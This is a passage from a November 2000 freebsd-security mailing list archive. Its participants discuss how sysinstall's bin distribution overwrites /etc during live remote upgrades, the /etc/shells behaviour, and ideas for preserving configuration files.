<003f01c04f3e$3c77e170$4c00000a@sage>; from rraykov@sageian.com on Wed, Nov 15, 2000 at 02:57:08PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --d6Gm4EdcadzBjdND Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Nov 15, 2000 at 02:57:08PM -0500, Rossen Raykov wrote: > My question is : is it normal to achieve such a results after this action? > Is the sysinstall behavior correct? Why there ware no warnings about changes > in /etc/passwd? > Is it normal the behavior on toor alias? Installing the bin distribution overwrites /etc (along with overwriting all other parts of the base system, like you asked it to). Live remote upgrades of a running system like this are dangerous for that reason. I did think sysinstall prompted for a root password, though. Even so, since you're installing on a multi-user system with logins enabled during the upgrade theres still a race condition before the password file is updated. Don't do that :-) Kris --d6Gm4EdcadzBjdND Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoS92MACgkQWry0BWjoQKWnfgCguTF8SxmplZ9yx1flNgQe8N38 fxkAmwdjwwAwoB4raLlocc+UwIfmujJT =WJ3o -----END PGP SIGNATURE----- --d6Gm4EdcadzBjdND-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 12:55: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from grok.example.net (cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by hub.freebsd.org (Postfix) with ESMTP id 443FD37B479 for ; Wed, 15 Nov 2000 12:55:05 -0800 (PST) Received: by grok.example.net (Postfix, from userid 1000) id 9B81A21314D; Wed, 15 Nov 2000 12:55:04 -0800 (PST) Date: Wed, 15 Nov 2000 12:55:04 -0800 From: Steve Reid To: Gerhard Sittig Cc: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001115125504.Q3759@grok> References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok> <20001115192259.Q27042@speedy.gsinet> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <20001115192259.Q27042@speedy.gsinet>; from Gerhard Sittig on Wed, Nov 15, 2000 at 07:22:59PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 15, 2000 at 07:22:59PM +0100, Gerhard Sittig wrote: > ipf already has a feature like ppp's MYADDR -- specify 0.0.0.0/32 > as the IP and issue "ipf -y" when interface configuration changes I can't get this to work with stock ipf in 4.1-R (ipf v3.4.8). Nothing gets through. Is 0.0.0.0/32 a recent addition, or is it or the operator just broken in 4.1-R? > And BTW: You do bind your rules to interfaces ("... on $IF") > already, don't you? Of course. > If it's just for variable substitution or conditional > "compilation", you might find my patch described in > http://www.freebsd.org/cgi/query-pr.cgi?pr=21989 of interest. I thought I saw that mentioned somewhere. I haven't bothered upgrading ipf though, as all the preprocessing I need can be done in a few lines of shell script. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 13:11:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 81FCC37B4FE; Wed, 15 Nov 2000 13:11:07 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAFLCQ521776; Wed, 15 Nov 2000 13:12:26 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 13:12:26 -0800 From: Kris Kennaway To: Kris Kennaway Cc: Rossen Raykov , security@FreeBSD.ORG Subject: Re: problem using sysinstall Message-ID: <20001115131226.A21677@citusc17.usc.edu> References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IJpNTDwzlM2Ie8A6" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001115125148.A21232@citusc17.usc.edu>; from kris@FreeBSD.ORG on Wed, Nov 15, 2000 at 12:51:48PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IJpNTDwzlM2Ie8A6 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 15, 2000 at 12:51:48PM -0800, Kris Kennaway wrote: > On Wed, Nov 15, 2000 at 02:57:08PM -0500, Rossen Raykov wrote: >=20 > > My question is : is it normal to achieve such a results after this acti= on? > > Is the sysinstall behavior correct? Why there ware no warnings about ch= anges > > in /etc/passwd? > > Is it normal the behavior on toor alias? >=20 > Installing the bin distribution overwrites /etc (along with > overwriting all other parts of the base system, like you asked it to). >=20 > Live remote upgrades of a running system like this are dangerous for > that reason. I did think sysinstall prompted for a root password, > though. Even so, since you're installing on a multi-user system with I overlooked the fact that your ssh connection was disconnected before the upgrade finished - I assume this explains why you weren't prompted, since systinstall was terminated when you disconnected. However my previous note about the race condition still stands. There's not much which can be done about this - basically, you should be only doing OS upgrade work on a single-user box via the console or serial console. Kris P.S. Why are you allowing remote root logins, anyway? --IJpNTDwzlM2Ie8A6 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoS/DoACgkQWry0BWjoQKUt/QCfVKweHoN8kMPR/CpxWALRpKP2 HHgAoOXaD467O0woTVkMgq5iAOOBG+nJ =18jm -----END PGP SIGNATURE----- --IJpNTDwzlM2Ie8A6-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 13:46:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id B322C37B479; Wed, 15 Nov 2000 13:46:54 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 7583E6A904; Wed, 15 Nov 2000 16:46:53 -0500 (EST) Message-ID: <00d301c04f4d$e9802760$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: Cc: References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu> Subject: Re: problem using sysinstall Date: Wed, 15 Nov 2000 16:49:21 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I'm not allowing remote root login anywhere! I'm doing ssh admin_user_name followed by su to root from this account. I'm curious for the answer of my second question: Is it normal to receive the command prompt for an account without a shell in /etc/passwd? Also there ware lots of bugs in the bin distribution - top, telnet ... is there a way/tool to reinstall those binaries remote. It will be fine if all binaries are reinstalled. Why I someone will do that? Imagine a firewall on which you will not like to support any development tools. How you will upgrade the binaries if you don't have at least one more box with the same OS? Thanks, Rossen ----- Original Message ----- From: To: Cc: ; Sent: Wednesday, November 15, 2000 4:12 PM Subject: Re: problem using sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 13:48:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 7A10437B4D7; Wed, 15 Nov 2000 13:48:40 -0800 (PST) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id QAA88899; Wed, 15 Nov 2000 16:48:39 -0500 (EST) (envelope-from str) Date: Wed, 15 Nov 2000 16:48:39 -0500 (EST) From: Igor Roshchin Message-Id: <200011152148.QAA88899@giganda.komkon.org> To: kris@FreeBSD.ORG Subject: Re: problem using sysinstall Cc: rraykov@sageian.com, security@FreeBSD.ORG In-Reply-To: <20001115131226.A21677@citusc17.usc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Date: Wed, 15 Nov 2000 13:12:26 -0800 > From: Kris Kennaway > To: Kris Kennaway > Cc: Rossen Raykov , security@FreeBSD.ORG > Subject: Re: problem using sysinstall > <..> > > Installing the bin distribution overwrites /etc (along with > > overwriting all other parts of the base system, like you asked it to). > >=20 > > Live remote upgrades of a running system like this are dangerous for > > that reason. I did think sysinstall prompted for a root password, > > though. Even so, since you're installing on a multi-user system with > > I overlooked the fact that your ssh connection was disconnected before > the upgrade finished - I assume this explains why you weren't > prompted, since systinstall was terminated when you > disconnected. However my previous note about the race condition still > stands. > > There's not much which can be done about this - basically, you should > be only doing OS upgrade work on a single-user box via the console or > serial console. > > Kris > > P.S. Why are you allowing remote root logins, anyway? > Well, although we all understand what is "The Good Thing", the reality of life makes us to do some compromises. I believe, several (I would even say `many' ) people on this list have done upgrades (either via "make world" or via sysinstall) a) remotely b) in a multiuser mode. There are multiple reasons (colocation box, box at client's cite, ...), it's not the question to argue about, that's the reality of life. In some cases one just don't have a luxury to have a serial console attached to some other computer or a modem. What can be done about it ? 1. Obvious way: Make a statement "This is a BAD thing", so if you do it, it's your problem. (I am not criticizing or flaming anybody here.) 2. May be keep such possibilities (multiuser-mode upgrade) in mind when working on programs like "sysinstall", and Makefile' "install" tag, and I think so far it was the case. (Well, I know, the sysinstall is already complicated enough, and it's all "patched" on top of what was a temporary "hack", and the new sysinstall might be coming up soon). Well, a note "do it on your own risk" can still be attached to it. Over the years the sysinstall functionality has been improved dramatically, providing with several new options which somebody in 199[34] would consider to be unnecessary luxury. I should admit, every time I hit the button "enter" to do a remote upgrade I am worrying if it will come up again smoothly... Usually it does. Very seldom the system didn't come up smoothly, but then it was an error on my part, when I was forgeting to do some changes and checks. I even created my own "check list" for upgrades like that. (hint, hint: I might be missing it and it exists somewhere in the FAQ or the handbook, then I apologize, but a nice, concise check list can be helpful to many people). As for the root logins - sometimes, when I do my remote upgrades, or need to unmount/remount/check some disks, I open remote root logins via ssh. This allows me to kick out all users, and unmount the partition with home directories, and also keep all users from loging simply with "/etc/nologin". Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 13:52:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1027C37B4CF; Wed, 15 Nov 2000 13:52:13 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAFLrW622584; Wed, 15 Nov 2000 13:53:32 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 13:53:32 -0800 From: Kris Kennaway To: Rossen Raykov Cc: kris@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: problem using sysinstall Message-ID: <20001115135331.A22524@citusc17.usc.edu> References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu> <00d301c04f4d$e9802760$4c00000a@sage> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="YZ5djTAD1cGYuMQK" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00d301c04f4d$e9802760$4c00000a@sage>; from rraykov@sageian.com on Wed, Nov 15, 2000 at 04:49:21PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --YZ5djTAD1cGYuMQK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 15, 2000 at 04:49:21PM -0500, Rossen Raykov wrote: > Hi, >=20 > I'm not allowing remote root login anywhere! > I'm doing ssh admin_user_name followed by su to root from this account. OK. > I'm curious for the answer of my second question: > Is it normal to receive the command prompt for an account without a shell= in > /etc/passwd? The shell must be listed in /etc/shells. > Also there ware lots of bugs in the bin distribution - top, telnet ... is > there a way/tool to reinstall those binaries remote. > It will be fine if all binaries are reinstalled. Binary patches aren't currently produced - there are difficulties in creating and maintaining such a system which no-one has overcome yet. Rebuild the utility from source on another machine and copy it over. > How you will upgrade the binaries if you don't have at least one more box > with the same OS? You can't, easily. However upgrading to a -stable snapshot after the problem has been fixed will cover it. Kris --YZ5djTAD1cGYuMQK Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoTBdsACgkQWry0BWjoQKVH1ACfYnTly0xu9CSbRmAwraEQFO5L R2QAoJ/kYIcH64QzsyUH7LEKuFEOoU+T =nXPV -----END PGP SIGNATURE----- --YZ5djTAD1cGYuMQK-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 13:58:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 6F53D37B4CF; Wed, 15 Nov 2000 13:58:45 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAFM02E22687; Wed, 15 Nov 2000 14:00:03 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 14:00:02 -0800 From: Kris Kennaway To: Igor Roshchin Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG Subject: Re: problem using sysinstall Message-ID: <20001115140002.B22524@citusc17.usc.edu> References: <20001115131226.A21677@citusc17.usc.edu> <200011152148.QAA88899@giganda.komkon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="O5XBE6gyVG5Rl6Rj" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011152148.QAA88899@giganda.komkon.org>; from str@giganda.komkon.org on Wed, Nov 15, 2000 at 04:48:39PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --O5XBE6gyVG5Rl6Rj Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 15, 2000 at 04:48:39PM -0500, Igor Roshchin wrote: > Well, although we all understand what is "The Good Thing", > the reality of life makes us to do some compromises. > I believe, several (I would even say `many' ) > people on this list have done upgrades=20 > (either via "make world" or via sysinstall) a) remotely Many people like to jump out of planes for thrills, too :-) > What can be done about it ? > 1. Obvious way: Make a statement "This is a BAD thing", > so if you do it, it's your problem. > (I am not criticizing or flaming anybody here.) Already done :) > 2. May be keep such possibilities (multiuser-mode upgrade) The problem is endemic to what sysinstall is doing. Installing the bin distribution overwrites /etc, which resets settings to the default. Theres no way to keep your system secure until you go back and merge your changes. Thats why you have to make it appropriately single-user until you've done that step. Kris --O5XBE6gyVG5Rl6Rj Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoTB18ACgkQWry0BWjoQKUURACfWGgrhI59QKx/79k8v1ttoseb HZEAnAsvXBvIuhIQbjlwlKw1LrzHmqeY =jO+l -----END PGP SIGNATURE----- --O5XBE6gyVG5Rl6Rj-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 14:13: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 0969037B4CF; Wed, 15 Nov 2000 14:12:58 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 7A8376A904; Wed, 15 Nov 2000 17:12:56 -0500 (EST) Message-ID: <010701c04f51$8d2659e0$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: Cc: References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu> <00d301c04f4d$e9802760$4c00000a@sage> <20001115135331.A22524@citusc17.usc.edu> Subject: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) Date: Wed, 15 Nov 2000 17:15:24 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Initially the /etc/shells file contains an empty line (between the comments and the first shell). I tough that this is the reason why login is granted on a person without shell in /etc/passwd. But I ware wrong! I removed this line from /etc/shells and even after that I was able to gain root command prompt after a valid password. The shell is /bin/sh Don't this violate the idea of /etc/shells? Regards, Rossen ----- Original Message ----- From: To: Cc: ; Sent: Wednesday, November 15, 2000 4:53 PM Subject: Re: problem using sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 14:26:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 2A81437B479 for ; Wed, 15 Nov 2000 14:26:32 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 833CE6A904 for ; Wed, 15 Nov 2000 17:26:30 -0500 (EST) Message-ID: <011501c04f53$7257f220$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: References: <20001115131226.A21677@citusc17.usc.edu> <200011152148.QAA88899@giganda.komkon.org> <20001115140002.B22524@citusc17.usc.edu> Subject: Re: problem using sysinstall Date: Wed, 15 Nov 2000 17:28:58 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following statements: 1) Configure Do post-install configuration of FreeBSD 2) Distributions Install additional distribution sets 3) bin Binary base distribution (required) and the banners are not telling you that something in /etc will be changed! During the whole process one will think that he/she is doing "post-install configuration"! It will be very helpful if there is an message that this will change staff in /etc too! Regards, Rossen ----- Original Message ----- From: To: Cc: ; ; Sent: Wednesday, November 15, 2000 5:00 PM Subject: Re: problem using sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 14:58:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 24FD737B4C5; Wed, 15 Nov 2000 14:58:14 -0800 (PST) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id RAA91169; Wed, 15 Nov 2000 17:58:13 -0500 (EST) (envelope-from str) Date: Wed, 15 Nov 2000 17:58:13 -0500 (EST) From: Igor Roshchin Message-Id: <200011152258.RAA91169@giganda.komkon.org> To: kris@FreeBSD.ORG, str@giganda.komkon.org Subject: Re: problem using sysinstall Cc: rraykov@sageian.com, security@FreeBSD.ORG In-Reply-To: <20001115140002.B22524@citusc17.usc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Date: Wed, 15 Nov 2000 14:00:02 -0800 > From: Kris Kennaway > To: Igor Roshchin > Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG > Subject: Re: problem using sysinstall > > > > > 2. May be keep such possibilities (multiuser-mode upgrade) > > The problem is endemic to what sysinstall is doing. Installing the bin > distribution overwrites /etc, which resets settings to the > default. Theres no way to keep your system secure until you go back > and merge your changes. Thats why you have to make it appropriately > single-user until you've done that step. > > Kris > I wonder if there is a fundamental reason why /etc needs to be overwritten, or it is just because the sysinstall is doing so. So, is it possible to specify to sysinstall (as an option) to put new /etc into some other directory (/var/tmp/etc, or whatever) from the very beginning ? Obviously, one needs some files to be update, so they are in sync with the new version of the OS (e.g. /etc/rc , /etc/rc.network). But what about the set of the files that are usually left intact during the "make install" process (passwd, master.passwd, group, aliases, rc.conf, ...) ? It might be possible to preserve the integrity of the system without sacrificing its security, if it is well thought of. I believe it is already done (I mean, the thinking) for "make install". Then the old files can be updated using "mergemaster", or by other means. Quite likely I am missing something in this picture. What ? Regards, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 15: 5:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 9440637B4C5; Wed, 15 Nov 2000 15:05:50 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAFN79B24075; Wed, 15 Nov 2000 15:07:09 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 15:07:09 -0800 From: Kris Kennaway To: Igor Roshchin Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG Subject: Re: problem using sysinstall Message-ID: <20001115150709.A24024@citusc17.usc.edu> References: <20001115140002.B22524@citusc17.usc.edu> <200011152258.RAA91169@giganda.komkon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IS0zKkzwUGydFO0o" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011152258.RAA91169@giganda.komkon.org>; from str@giganda.komkon.org on Wed, Nov 15, 2000 at 05:58:13PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IS0zKkzwUGydFO0o Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 15, 2000 at 05:58:13PM -0500, Igor Roshchin wrote: > I wonder if there is a fundamental reason why /etc needs to be=20 > overwritten, or it is just because the sysinstall is doing so. > So, is it possible to specify to sysinstall (as an option) > to put new /etc into some other directory (/var/tmp/etc, > or whatever) from the very beginning ? That would require breaking the bin distribution up into bin + etc (since it's extracted by tar), or special casing it and treating it differently from all of the other distributions (and extracting it in two stages). Traditionally bin has been the minimum necessary to get a working FreeBSD system, if we add an etc that no longer becomes true. I think the answer is now in the realm of "this is how it's always worked before, if you want to change it, submit patches" :-) Kris --IS0zKkzwUGydFO0o Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoTFx0ACgkQWry0BWjoQKV/NwCeNoBzuApGCOOaL5iNWHy2kv0p gREAoOdwHrGmqlX/VAMTP5OqUKQ+M2NN =umZL -----END PGP SIGNATURE----- --IS0zKkzwUGydFO0o-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 17:40:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 81B9B37B479; Wed, 15 Nov 2000 17:40:11 -0800 (PST) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id UAA95904; Wed, 15 Nov 2000 20:40:10 -0500 (EST) (envelope-from str) Date: Wed, 15 Nov 2000 20:40:10 -0500 (EST) From: Igor Roshchin Message-Id: <200011160140.UAA95904@giganda.komkon.org> To: kris@FreeBSD.ORG, security@FreeBSD.ORG, str@giganda.komkon.org Subject: Re: problem using sysinstall In-Reply-To: <20001115150709.A24024@citusc17.usc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Date: Wed, 15 Nov 2000 15:07:09 -0800 > From: Kris Kennaway > To: Igor Roshchin > Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG > Subject: Re: problem using sysinstall > > On Wed, Nov 15, 2000 at 05:58:13PM -0500, Igor Roshchin wrote: > > > I wonder if there is a fundamental reason why /etc needs to be=20 > > overwritten, or it is just because the sysinstall is doing so. > > So, is it possible to specify to sysinstall (as an option) > > to put new /etc into some other directory (/var/tmp/etc, > > or whatever) from the very beginning ? > > That would require breaking the bin distribution up into bin + etc > (since it's extracted by tar), or special casing it and treating it > differently from all of the other distributions (and extracting it in > two stages). Traditionally bin has been the minimum necessary to get a > working FreeBSD system, if we add an etc that no longer becomes true. No change in the tradition is required. How about extracting the bin ditribution into a different "root" (say /var/tmp/updated or whatever), so both, $NEWROOT/etc, $NEWROOT/bin, will be extracted there first, and then $NEWROOT/bin is moved by the sysinstall into /bin, and the necessary part of $NEWROOT/etc into /etc. The "leftovers" of /etc can go into /var/tmp/etc . Well, yes, this will add some time and disk space overhead. But, I as I suggested earlier, it can be an option in sysinstall. At the same time the 1st step, being analogous (in some sense) to "make buildworld" would insure that the bin distribution is unpacked alright, and that the system will not get stuck in a half-way-through upgraded system (not that it's been a major concern so far, so regard it as a "positive side effect"). > > I think the answer is now in the realm of "this is how it's always > worked before, if you want to change it, submit patches" :-) > > Kris > SInce I am not in position to submit patches in this case, and otherwise my idea(s) was made clear (I hope), I just shut_up(8). :) Igor PS. IIRC, there is a work in progress on creating a new sysinstall (is this true?). If that's the case, it doesn't make sense to submit patches, but may be just to implement this behavior in the new generation of sysinstall. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 17:48:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2CB5437B4CF; Wed, 15 Nov 2000 17:48:24 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (2683 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Wed, 15 Nov 2000 19:47:36 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Wed, 15 Nov 2000 19:47:26 -0600 (CST) From: James Wyatt To: Kris Kennaway Cc: Igor Roshchin , rraykov@sageian.com, security@FreeBSD.ORG Subject: Re: problem using sysinstall In-Reply-To: <20001115140002.B22524@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/Mixed; MICALG=pgp-md5; PROTOCOL="application/pgp-signature"; BOUNDARY=O5XBE6gyVG5Rl6Rj Content-ID: Content-Disposition: INLINE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --O5XBE6gyVG5Rl6Rj Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Content-Disposition: INLINE On Wed, 15 Nov 2000, Kris Kennaway wrote: > On Wed, Nov 15, 2000 at 04:48:39PM -0500, Igor Roshchin wrote: > > Well, although we all understand what is "The Good Thing", > > the reality of life makes us to do some compromises. > > I believe, several (I would even say `many' ) > > people on this list have done upgrades > > (either via "make world" or via sysinstall) a) remotely > > Many people like to jump out of planes for thrills, too :-) Yes, but they receive a *lot* of warnings before they do, they see others do it and live. Then, of course, they have a parachute too... (^_^) What about not letting a bin extract *overwrite* files? (I know there is work for that and I haven't offered to do it, but I'm asking to consider it.) When doing an install from scratch, the mkfs has been run, so the filesystem is clean. I don't know what to do for binaries for upgrades, but the current approach doesn't work for that either, right? If I'm off-base, say so and I'll crawl back into the machine room - Jy@ --O5XBE6gyVG5Rl6Rj Content-Type: APPLICATION/PGP-SIGNATURE; CHARSET=US-ASCII Content-ID: Content-Description: Content-Disposition: INLINE -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoTB18ACgkQWry0BWjoQKUURACfWGgrhI59QKx/79k8v1ttoseb HZEAnAsvXBvIuhIQbjlwlKw1LrzHmqeY =jO+l -----END PGP SIGNATURE----- --O5XBE6gyVG5Rl6Rj-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 18:52:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from rins.st.ryukoku.ac.jp (rins.st.ryukoku.ac.jp [133.83.4.1]) by hub.freebsd.org (Postfix) with ESMTP id AF3F937B479 for ; Wed, 15 Nov 2000 18:52:40 -0800 (PST) Received: from ideon.st.ryukoku.ac.jp (ideon.st.ryukoku.ac.jp 